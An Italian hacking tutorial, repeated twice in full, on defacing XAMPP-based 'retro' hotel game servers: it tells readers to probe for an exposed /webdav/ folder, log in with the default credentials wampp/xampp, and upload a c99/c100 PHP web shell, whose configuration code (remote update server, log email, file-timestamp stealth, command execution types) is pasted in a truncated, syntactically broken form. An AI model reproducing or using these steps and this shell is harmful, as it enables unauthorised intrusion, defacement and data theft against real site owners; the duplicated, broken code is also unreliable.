Questo bug è riscontrato maggiormente nei RetroServer fatti con Xampp che hanno ancora all'interno la cartella "WebDav".
Noi possiamo sfruttare questa cartella per inniettare una
"Shell" malignia e pericolosa , con cui andremo in seguito a defacciare , ecco il materiale :
1) Scaricare Bitkinex Bitikinex Download
2) Come individuare un hotel vulnerabile?
Bhè questa operazione è molto semplice e a dir poco banale : basterà scrivere in alto all'Url
"nomehotel/webdav/" e inviare, dopodichè abbiamo inviato
apparirà una pagina con scritto : "WebDav TestPage"
il retro è vulnerabile....bene adesso passiamo alla pratica..
3)Aprire bitKniex, premere connect in alto e scrivere
Url Del Sito: "http://nomesito/webdav/"
Utente ( Inseriamo ): wampp
Password ( mettete ): xampp
Una volta connessi dovremmo visualizzare una cartella con dentro
"index.html" e "webdav.txt", bene se verranno visualizzati a questo punto
dobbiamo inniettare la nostra shell
vi consiglio la c99 eccola qua :
Codice PHP: <?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
error_reporting(5);
@ignore_user_abort(TRUE);
@SET_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);} else {$arr = stripslashes($arr);} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;
$shver = "c100"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);}
else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (UR Ls) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server qu ote (seconds), 0 = unlimited.$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = " Shell [ci] . Biz ".$shver.": access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE )
$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server
$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by Shell [ci] .Biz</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_h tml.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan ...)
$log_email = "shell4spam@gmail.com"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{ break})
...
)
s...
Fonte : Travelsquare
Alla Prossima ;-)
Noi possiamo sfruttare questa cartella per inniettare una
"Shell" malignia e pericolosa , con cui andremo in seguito a defacciare , ecco il materiale :
1) Scaricare Bitkinex Bitikinex Download
2) Come individuare un hotel vulnerabile?
Bhè questa operazione è molto semplice e a dir poco banale : basterà scrivere in alto all'Url
"nomehotel/webdav/" e inviare, dopodichè abbiamo inviato
apparirà una pagina con scritto : "WebDav TestPage"
il retro è vulnerabile....bene adesso passiamo alla pratica..
3)Aprire bitKniex, premere connect in alto e scrivere
Url Del Sito: "http://nomesito/webdav/"
Utente ( Inseriamo ): wampp
Password ( mettete ): xampp
Una volta connessi dovremmo visualizzare una cartella con dentro
"index.html" e "webdav.txt", bene se verranno visualizzati a questo punto
dobbiamo inniettare la nostra shell
vi consiglio la c99 eccola qua :
Codice PHP: <?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
error_reporting(5);
@ignore_user_abort(TRUE);
@SET_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);} else {$arr = stripslashes($arr);} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;
$shver = "c100"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);}
else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (UR Ls) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server qu ote (seconds), 0 = unlimited.$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = " Shell [ci] . Biz ".$shver.": access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE )
$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server
$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by Shell [ci] .Biz</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_h tml.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan ...)
$log_email = "shell4spam@gmail.com"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{ break})
...
)
s...
Fonte : Travelsquare
Alla Prossima ;-)
